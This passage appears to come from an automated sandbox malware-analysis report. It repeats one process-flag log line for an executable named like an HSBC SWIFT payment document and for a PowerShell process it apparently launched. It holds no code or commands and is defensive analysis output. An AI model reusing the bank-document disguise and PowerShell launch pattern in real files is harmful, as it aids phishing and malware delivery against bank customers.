          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
